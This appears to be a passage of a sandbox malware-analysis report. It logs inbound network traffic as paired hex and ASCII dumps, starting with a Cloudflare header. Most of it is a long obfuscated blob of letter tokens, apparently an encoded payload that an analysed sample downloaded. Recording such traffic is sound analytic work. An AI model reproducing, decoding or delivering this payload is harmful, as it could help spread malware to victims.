2021-10-29 18:50:03 UTC	1255	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
2021-10-29 18:50:03 UTC	1255	IN	Data Raw: 43 4e 56 4c 72 59 63 4d 49 57 2d 4d 4d 20 57 43 20 4e 72 72 20 43 20 4c 20 43 20 43 20 43 20 72 20 43 20 43 20 43 20 56 59 59 20 56 59 59 20 43 20 43 20 4e 49 72 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 63 72 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 4e 56 49 20 43 20 43 20 43 20 4e 72 20 4c 4e 20 4e 49 63 20 4e 72 20 43 20 4e 49 43 20 57 20 56 43 59 20 4c 4c 20 4e 49 72 20 4e 20 4d 63 20 56 43 59 20 4c 4c 20 49 72 20 4e 43 72 20 4e 43 59 20 4e 4e 59 20 4c 56 20 4e 4e 56 20 4e 4e 72 20 4e 4e 4e 20 4e 43 4c 20 4e 4e 72 20 57 4d 20 4e 43 57 20 4c 56 20 57 57 20 57 4d 20 4e 4e 43 20 4e Data Ascii: CNVLrYcMIW-MM WC Nrr C L C C C r C C C VYY VYY C C NIr C C C C C C C cr C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C NVI C C C Nr LN NIc Nr C NIC W VCY LL NIr N Mc VCY LL Ir NCr NCY NNY LV NNV NNr NNN NCL NNr WM NCW LV WW WM NNC N
2021-10-29 18:50:03 UTC	1256	IN	Data Raw: 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 56 59 20 72 43 20 56 56 57 20 4e 43 57 20 4e 4e 59 20 59 43 20 72 49 20 59 43 20 59 43 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 72 63 20 4e 72 4c 20 59 43 20 72 49 20 4e 4c 49 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 4e 56 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 Data Ascii: C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C VY rC VVW NCW NNY YC rI YC YC Ir NNr NNM Nrc NrL YC rI NLI Yr Ir NNr NNM NCW NNV YC NNV YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr
2021-10-29 18:50:03 UTC	1258	IN	Data Raw: 20 59 43 20 4e 59 63 20 4e 49 4c 20 59 59 20 49 72 20 4e 4e 72 20 49 59 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 49 72 20 59 4e 20 59 72 20 49 72 20 4e 4e 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 49 20 59 72 20 49 72 20 4e 49 20 57 4e 20 4c 4e 20 4c 20 63 72 20 49 4c 20 59 43 20 59 72 20 49 72 20 4e 4d 49 20 4e 4e 49 20 4e 43 57 20 4e 4e 56 20 59 43 20 56 72 43 20 59 4e 20 59 72 20 49 72 20 4e 4e 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 57 43 20 72 57 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 59 4c 20 4e 43 57 20 4e 4e 56 20 4e 4e 72 20 4c 43 20 63 Data Ascii: YC NYc NIL YY Ir NNr IY NCW NNV YC NIr YN Yr Ir NNI NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI NI Yr Ir NI WN LN L cr IL YC Yr Ir NMI NNI NCW NNV YC VrC YN Yr Ir NNI NNM NCW NNV NWC rW YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr YL NCW NNV NNr LC c
2021-10-29 18:50:03 UTC	1259	IN	Data Raw: 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 Data Ascii: YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr
2021-10-29 18:50:03 UTC	1260	IN	Data Raw: 20 4c 4d 20 72 4d 20 56 4e 4d 20 72 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 56 4c 20 4c 49 20 63 72 20 59 59 20 49 72 20 4e 4e 72 20 59 20 4c 4e 20 72 4e 20 59 43 20 72 49 20 63 63 20 4d 56 20 4d 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 49 49 20 72 59 20 72 49 20 59 43 20 63 43 20 56 72 63 20 49 4d 20 57 49 20 4c 4e 20 4e 20 59 43 20 72 49 20 63 63 20 63 49 20 56 59 4e 20 4e 4e 72 20 4e 4e 4d 20 56 57 20 4e 72 20 72 72 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 4e 43 57 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4e 72 72 20 56 4e 20 72 56 20 63 49 20 4e 72 4d 20 4e 4e 72 20 4e 4e 4d 20 56 57 20 56 20 59 4c 20 72 57 20 59 43 20 4d 43 20 72 56 20 4e 43 49 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 56 63 20 72 4d 20 59 43 20 59 72 20 57 72 20 56 43 49 20 57 4c 20 Data Ascii: LM rM VNM rV NNM NCW NNL VL LI cr YY Ir NNr Y LN rN YC rI cc MV Mr NNr NNM NCL II rY rI YC cC Vrc IM WI LN N YC rI cc cI VYN NNr NNM VW Nr rr rI YC cC NVr NCW NNM NCW NVV Nrr VN rV cI NrM NNr NNM VW V YL rW YC MC rV NCI NNM NCW NVV Vc rM YC Yr Wr VCI WL
2021-10-29 18:50:03 UTC	1262	IN	Data Raw: 20 4e 4e 4c 20 63 57 20 4e 4e 72 20 59 43 20 72 49 20 56 59 20 49 57 20 4e 4e 56 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 4d 20 59 59 20 4c 4c 20 59 72 20 56 43 43 20 49 56 20 4e 63 72 20 4e 4e 63 20 4e 43 57 20 4e 4e 49 20 63 59 20 4c 43 20 59 43 20 59 72 20 57 72 20 4e 56 20 4e 4c 57 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 4e 20 4c 4e 20 4c 4c 20 4e 4e 72 20 4e 56 20 4e 72 56 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 43 63 20 59 56 20 56 4c 59 20 49 59 20 4e 4e 72 20 4e 4e 59 20 4c 43 20 57 59 20 59 43 20 72 49 20 59 63 20 4e 57 20 56 4e 56 20 4e 72 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 63 20 59 4e 20 59 43 20 59 72 20 4e 56 4d 20 56 57 20 57 59 20 4e 43 49 20 4e 4e 56 20 59 56 20 4c 4c 20 59 59 20 4c 57 20 49 43 20 4e 72 43 20 4e 4e 59 20 4e 49 63 Data Ascii: NNL cW NNr YC rI VY IW NNV NNY NNM NCM WM YY LL Yr VCC IV Ncr NNc NCW NNI cY LC YC Yr Wr NV NLW NCW NNV Yr VN LN LL NNr NV NrV NCW NNV Yr VCc YV VLY IY NNr NNY LC WY YC rI Yc NW VNV NrC NNM NCW NNc Vc YN YC Yr NVM VW WY NCI NNV YV LL YY LW IC NrC NNY NIc
2021-10-29 18:50:03 UTC	1263	IN	Data Raw: 20 59 43 20 59 72 20 57 72 20 57 43 20 4d 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 59 57 20 59 4c 20 4c 43 20 4e 4e 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 4c 20 59 4c 20 59 72 20 63 4c 20 56 4c 59 20 4e 56 4d 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 56 63 20 59 63 20 59 43 20 59 72 20 49 56 20 4e 56 63 20 4e 4e 72 20 4c 43 20 56 4e 57 20 59 43 20 72 49 20 59 56 20 4c 4d 20 49 43 20 57 57 20 4e 4e 4c 20 4e 4e 4c 20 56 59 4c 20 4e 43 72 20 72 49 20 59 43 20 59 59 20 4e 4e 4c 20 4e 63 56 20 56 56 56 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 72 20 59 20 59 72 20 49 72 20 4e 56 43 20 63 20 49 59 20 4e 4e 56 20 59 43 20 59 49 20 57 4c 20 4e 4c 59 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4d 59 20 4e 43 56 20 4c 4c 20 59 4c 20 4e 43 20 56 4c 72 20 49 72 20 Data Ascii: YC Yr Wr WC Mc NCW NNV Yc YW YL LC NNC NNr NNM NCL WL YL Yr cL VLY NVM NNY NNM NCW NNr Vc Yc YC Yr IV NVc NNr LC VNW YC rI YV LM IC WW NNL NNL VYL NCr rI YC YY NNL NcV VVV NCW NNV Yr Vr Y Yr Ir NVC c IY NNV YC YI WL NLY Ir NNr NNY MY NCV LL YL NC VLr Ir
2021-10-29 18:50:03 UTC	1264	IN	Data Raw: 20 49 72 20 4e 4e 72 20 4c 49 20 4e 43 49 20 4e 4e 56 20 59 43 20 4e 43 59 20 59 4e 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 63 4e 20 72 49 20 59 43 20 59 59 20 4d 57 20 63 63 20 4e 4e 59 20 4e 43 57 20 59 56 20 72 49 20 72 49 20 59 43 20 59 4c 20 49 72 20 4e 4e 72 20 4e 43 43 20 4c 43 20 4d 57 20 59 43 20 72 49 20 59 63 20 63 43 20 49 63 20 4e 4e 4e 20 56 72 49 20 59 59 20 4e 4e 56 20 59 43 20 72 57 20 56 4c 20 56 4c 43 20 4e 72 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 49 49 20 59 20 72 49 20 59 43 20 63 43 20 4c 57 20 4d 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 56 63 20 57 20 59 43 20 59 72 20 57 72 20 4e 56 4e 20 4e 4e 72 20 63 57 20 4d 72 20 59 43 20 72 49 20 59 63 20 56 4d 20 49 4c 20 4e 4e 63 20 4e 56 43 20 4e 4d 63 20 Data Ascii: Ir NNr LI NCI NNV YC NCY YN Yr Ir NNL NNM NCW NNV cN rI YC YY MW cc NNY NCW YV rI rI YC YL Ir NNr NCC LC MW YC rI Yc cC Ic NNN VrI YY NNV YC rW VL VLC NrC NNr NNM NCY II Y rI YC cC LW Mr NNM NCW NVV Vc W YC Yr Wr NVN NNr cW Mr YC rI Yc VM IL NNc NVC NMc
2021-10-29 18:50:03 UTC	1266	IN	Data Raw: 43 49 20 49 59 20 56 56 63 20 56 4e 72 20 59 43 20 59 72 20 49 43 20 57 43 20 63 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 57 4c 20 4e 4e 56 20 59 43 20 59 72 20 57 4c 20 4e 4c 20 49 72 20 4e 4e 72 20 4e 56 4d 20 56 20 4d 56 20 59 4e 20 72 49 20 59 56 20 4c 57 20 49 4c 20 57 57 20 4e 4e 4c 20 4e 56 72 20 4e 4e 4d 20 72 59 20 63 4c 20 4e 57 4e 20 4e 43 49 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4d 56 20 4e 63 43 20 4e 59 59 20 72 49 20 59 43 20 59 43 20 4e 56 72 20 63 57 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 63 59 20 49 20 59 43 20 59 72 20 57 72 20 56 57 20 56 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 56 20 59 63 20 56 63 20 72 49 20 49 72 20 4e 4e 72 20 4e 4e 59 20 56 20 4d 72 20 59 4e 20 72 49 20 59 56 20 Data Ascii: CI IY VVc VNr YC Yr IC WC cc NCW NNV Yc cM NC Yr Ir NVC Vc NWL NNV YC Yr WL NL Ir NNr NVM V MV YN rI YV LW IL WW NNL NVr NNM rY cL NWN NCI Ir NNr NNc MV NcC NYY rI YC YC NVr cW NNM NCW NVV cY I YC Yr Wr VW VNM NCW NNV YV Yc Vc rI Ir NNr NNY V Mr YN rI YV
2021-10-29 18:50:03 UTC	1267	IN	Data Raw: 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 59 20 56 56 63 20 4e 4c 56 20 59 43 20 59 72 20 49 43 20 57 43 20 63 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 57 4c 20 4e 4e 56 20 59 43 20 59 72 20 57 4c 20 4e 4c 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 56 63 20 4e 4e 57 20 4c 59 20 59 59 20 72 4c 20 4e 49 4d 20 4e 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 59 20 56 56 63 20 4e 59 57 20 59 43 20 59 72 20 49 43 20 57 43 20 63 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 72 59 20 4e 4e 56 20 59 43 20 59 49 20 4c 4e 20 72 4e 20 63 57 20 4e 4e 4d 20 4e 43 49 20 56 56 72 20 72 56 20 59 43 20 72 49 20 59 4e 20 4e 57 20 4e 4c 56 20 4e 72 72 20 4e 4e 4d 20 4e 43 57 20 Data Ascii: Nr NNM NCI IY VVc NLV YC Yr IC WC cc NCW NNV Yc cM NC Yr Ir NVC Vc NWL NNV YC Yr WL NL Ir NNr NVM NVc NNW LY YY rL NIM Nr NNr NNM NCI IY VVc NYW YC Yr IC WC cc NCW NNV Yc cM NC Yr Ir NVC Vc rY NNV YC YI LN rN cW NNM NCI VVr rV YC rI YN NW NLV Nrr NNM NCW
2021-10-29 18:50:03 UTC	1268	IN	Data Raw: 59 20 4e 4e 4d 20 4e 43 57 20 4e 43 43 20 4c 4c 20 59 72 20 4c 59 20 59 43 20 63 57 20 4e 4e 57 20 4e 43 63 20 4e 56 43 20 56 59 4c 20 4e 43 72 20 72 49 20 59 43 20 59 59 20 4e 4e 4c 20 4e 63 56 20 4e 59 4d 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 72 20 59 20 59 72 20 49 72 20 4e 56 43 20 63 20 49 59 20 4e 4e 56 20 59 43 20 59 49 20 57 4c 20 4e 59 72 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4e 43 4e 20 49 49 20 59 56 20 72 49 20 59 43 20 72 49 20 4c 49 20 4e 20 4e 4e 57 20 4e 43 57 20 43 20 4d 63 20 72 63 20 59 43 20 59 72 20 57 72 20 56 57 20 4e 43 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 4c 59 20 59 4c 20 63 57 20 4e 63 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 57 20 59 49 20 4c 4c 20 59 49 20 4c 57 20 49 43 20 57 57 20 4e 4e 56 20 4e 4e 72 20 4e 56 72 20 4e 57 Data Ascii: Y NNM NCW NCC LL Yr LY YC cW NNW NCc NVC VYL NCr rI YC YY NNL NcV NYM NCW NNV Yr Vr Y Yr Ir NVC c IY NNV YC YI WL NYr Ir NNr NNY NCN II YV rI YC rI LI N NNW NCW C Mc rc YC Yr Wr VW NCc NCW NNV Yc LY YL cW Nc NNY NNM NCM WW YI LL YI LW IC WW NNV NNr NVr NW
2021-10-29 18:50:03 UTC	1270	IN	Data Raw: 56 4d 20 4e 4e 72 20 63 20 4e 20 72 56 20 72 49 20 4c 4c 20 59 57 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 72 59 20 4e 20 4e 20 59 4d 20 49 4d 20 57 43 20 63 56 20 4e 43 57 20 4e 4e 56 20 59 63 20 59 43 20 56 63 20 72 43 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4e 43 4c 20 57 4e 20 63 43 20 59 43 20 4c 63 20 4c 72 20 4e 56 72 20 49 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 57 4c 20 4e 4e 20 59 43 20 59 72 20 57 72 20 4e 56 43 20 4e 4d 4e 20 4e 4e 43 20 49 63 20 56 4c 63 20 72 49 20 59 56 20 56 49 20 49 59 20 57 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 72 20 59 43 20 4c 20 4e 4e 4e 20 4e 4e 72 20 4e 4e 49 20 57 49 20 4e 4e 56 20 59 43 20 72 57 20 4c 4c 20 63 20 49 63 20 4e 4e 72 20 49 56 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 59 20 59 43 20 Data Ascii: VM NNr c N rV rI LL YW IY NNM NCW NVV rY N N YM IM WC cV NCW NNV Yc YC Vc rC Ir NNr NNY NCL WN cC YC Lc Lr NVr Ir NNM NCW NNI WL NN YC Yr Wr NVC NMN NNC Ic VLc rI YV VI IY WI NNM NCW NNV YC Yr YC L NNN NNr NNI WI NNV YC rW LL c Ic NNr IV NCW NNV YC YY YC
2021-10-29 18:50:03 UTC	1271	IN	Data Raw: 56 20 59 43 20 56 4d 20 57 4c 20 56 72 49 20 49 59 20 4e 4e 72 20 4e 4e 59 20 56 20 4e 63 4e 20 59 4e 20 72 49 20 59 56 20 63 43 20 4e 4c 49 20 4e 4e 4c 20 49 4c 20 4e 4d 57 20 4e 4e 56 20 56 4c 63 20 59 4e 20 56 43 20 56 4c 56 20 49 72 20 4e 4e 63 20 57 59 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 4e 4c 20 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 4d 20 72 57 20 59 43 20 59 72 20 4d 63 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 49 4c 20 59 4e 20 72 49 20 59 43 20 59 4c 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 57 49 20 4e 4e 56 20 59 43 20 72 57 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 56 4e 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 72 20 59 4e 20 59 72 20 49 72 20 57 43 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 72 57 20 72 49 20 59 43 Data Ascii: V YC VM WL VrI IY NNr NNY V NcN YN rI YV cC NLI NNL IL NMW NNV VLc YN VC VLV Ir NNc WY NCW NNV YC NNL c Yr Ir NNr NNM NCW NNV YM rW YC Yr Mc NNr NNM NCW IL YN rI YC YL Ir NNr NNM WI NNV YC rW YC Yr Ir NNr NVN NCW NNV YC rr YN Yr Ir WC NNc NCW NNV rW rI YC
2021-10-29 18:50:03 UTC	1272	IN	Data Raw: 4e 72 20 57 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 56 20 4e 4e 72 20 56 72 57 20 56 59 59 20 4e 4e 56 20 72 57 20 59 49 20 59 43 20 59 72 20 49 59 20 4e 43 59 20 63 57 20 4e 43 59 20 4e 4e 56 20 4e 4e 72 20 72 57 20 59 43 20 59 72 20 57 59 20 4e 4e 72 20 4e 4e 4d 20 4e 56 72 20 4c 20 4e 56 4e 20 72 57 20 59 43 20 72 49 20 57 72 20 4e 4e 56 20 56 63 20 59 56 20 4e 4e 56 20 59 43 20 59 49 20 57 4c 20 4e 43 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 56 20 4d 56 20 4e 72 59 20 72 49 20 59 43 20 59 72 20 49 4c 20 56 57 20 4e 56 56 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 49 20 4c 4d 20 59 72 20 49 72 20 4e 4e 59 20 4e 56 4e 20 4e 43 4e 20 4c 4e 20 4e 4e 43 20 72 49 20 59 43 20 63 43 20 4c 49 20 56 72 4d 20 4e 4e 57 20 4e 43 57 20 Data Ascii: Nr WM NCW NNV YC rI YC Yr IV NNr VrW VYY NNV rW YI YC Yr IY NCY cW NCY NNV NNr rW YC Yr WY NNr NNM NVr L NVN rW YC rI Wr NNV Vc YV NNV YC YI WL NCW Ir NNr NVM NCV MV NrY rI YC Yr IL VW NVV NCW NNV Yc cI LM Yr Ir NNY NVN NCN LN NNC rI YC cC LI VrM NNW NCW
2021-10-29 18:50:03 UTC	1274	IN	Data Raw: 4e 4e 56 20 4c 59 20 63 4d 20 72 4c 20 59 72 20 49 72 20 4e 56 43 20 4e 56 4d 20 4e 4e 4e 20 4e 72 20 72 49 20 72 57 20 59 43 20 59 43 20 4e 4e 4c 20 57 59 20 57 49 20 4d 59 20 4e 72 20 59 4e 20 72 57 20 59 43 20 59 43 20 4e 4d 43 20 4e 4e 63 20 4e 59 4e 20 4e 43 49 20 4e 4e 56 20 59 56 20 63 4d 20 72 43 20 59 72 20 49 72 20 4e 56 43 20 49 43 20 56 4c 4d 20 4e 4e 72 20 59 4e 20 72 49 20 59 72 20 4c 43 20 49 59 20 4e 4e 72 20 4e 4e 4d 20 4d 43 20 4c 4e 20 72 63 20 72 49 20 59 43 20 63 43 20 57 59 20 4d 72 20 63 72 20 4e 43 49 20 4e 4e 56 20 59 43 20 59 59 20 57 4c 20 72 4c 20 49 72 20 4e 4e 72 20 4e 56 4d 20 57 4d 20 4e 56 43 20 72 56 20 4c 57 20 4c 4d 20 4e 49 4d 20 4e 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 59 20 4c 63 20 72 4d 20 72 56 20 4e 49 4d Data Ascii: NNV LY cM rL Yr Ir NVC NVM NNN Nr rI rW YC YC NNL WY WI MY Nr YN rW YC YC NMC NNc NYN NCI NNV YV cM rC Yr Ir NVC IC VLM NNr YN rI Yr LC IY NNr NNM MC LN rc rI YC cC WY Mr cr NCI NNV YC YY WL rL Ir NNr NVM WM NVC rV LW LM NIM NV NNr NNM NCI IY Lc rM rV NIM
2021-10-29 18:50:03 UTC	1275	IN	Data Raw: 4e 4c 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 72 43 20 59 4e 20 72 49 20 59 43 20 59 63 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4d 56 20 4e 43 57 20 4e 4e 56 20 59 43 20 56 4d 20 59 4e 20 59 72 20 49 72 20 56 63 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 72 57 20 72 49 20 59 43 20 59 72 20 57 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 4e 4e 72 20 59 43 20 72 49 20 59 43 20 4d 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 72 56 20 4e 4e 4c 20 59 43 20 72 49 20 4d 72 20 59 59 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 56 20 72 49 20 59 43 20 59 72 20 72 56 20 4e 4e 59 20 4e 4e 4d 20 Data Ascii: NLI NNr NNM NCW rC YN rI YC Yc Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr MV NCW NNV YC VM YN Yr Ir Vc NNc NCW NNV rW rI YC Yr Wr NNr NNM NCI NNr YC rI YC M Ir NNr NNM rV NNL YC rI Mr YY Ir NNr NVM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YV rI YC Yr rV NNY NNM
2021-10-29 18:50:03 UTC	1276	IN	Data Raw: 57 43 20 63 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 57 4c 20 4e 4e 56 20 59 43 20 59 72 20 57 4c 20 4e 4c 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 72 57 20 59 43 20 72 49 20 59 63 20 49 57 20 57 49 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 4d 20 59 56 20 59 63 20 4c 59 20 59 43 20 4d 49 20 56 59 59 20 72 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 56 4e 20 56 56 63 20 56 43 49 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 63 57 20 4d 4e 20 59 43 20 72 49 20 59 63 20 63 57 20 4e 43 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4c 4e 20 4e 59 49 20 72 49 20 59 43 20 72 49 20 59 57 20 4d 4c 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 57 4c 20 49 20 59 4e 20 59 72 20 49 56 20 57 57 20 4e 4e 59 20 4e 43 4e 20 57 4d 20 59 Data Ascii: WC cc NCW NNV Yc cM NC Yr Ir NVC Vc NWL NNV YC Yr WL NL Ir NNr NVM cW rW YC rI Yc IW WI NNY NNM NCM WM YV Yc LY YC MI VYY rM NCW NNV YN VN VVc VCI Ir NNr NNL cW MN YC rI Yc cW NCI NNr NNM NCL LN NYI rI YC rI YW ML NNM NCW NVV WL I YN Yr IV WW NNY NCN WM Y
2021-10-29 18:50:03 UTC	1278	IN	Data Raw: 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 4e 72 20 4e 4e 56 20 59 43 20 59 49 20 4c 72 20 59 72 20 49 63 20 4e 43 4e 20 56 72 49 20 59 59 20 4e 4e 56 20 59 43 20 72 57 20 56 4c 20 4c 56 20 4d 59 20 72 63 20 56 4c 56 20 4e 56 56 20 4c 4e 20 49 59 20 72 49 20 59 43 20 63 43 20 57 59 20 4e 4e 4d 20 4e 43 57 20 56 72 4d 20 4e 4e 43 20 4e 57 4e 20 4e 43 63 20 59 43 20 59 72 20 49 59 20 49 4d 20 4e 63 59 20 56 72 4c 20 4e 4e 56 20 59 43 20 59 56 20 56 63 20 4e 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4c 43 20 4d 56 20 59 43 20 72 49 20 59 63 20 4c 43 20 57 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 56 20 59 56 20 59 59 20 4c 4d 20 4e 4d 56 20 57 72 20 49 57 20 4e 4e 4c 20 4e 43 63 20 4e 43 56 20 4e 63 49 20 59 49 20 56 4c 63 20 59 4c 20 4e 4e 72 20 4e 4d 56 20 4e 4e Data Ascii: Yr Ir NVC Vc NNr NNV YC YI Lr Yr Ic NCN VrI YY NNV YC rW VL LV MY rc VLV NVV LN IY rI YC cC WY NNM NCW VrM NNC NWN NCc YC Yr IY IM NcY VrL NNV YC YV Vc N Ir NNr NVM LC MV YC rI Yc LC W NNr NNM NCL WV YV YY LM NMV Wr IW NNL NCc NCV NcI YI VLc YL NNr NMV NN
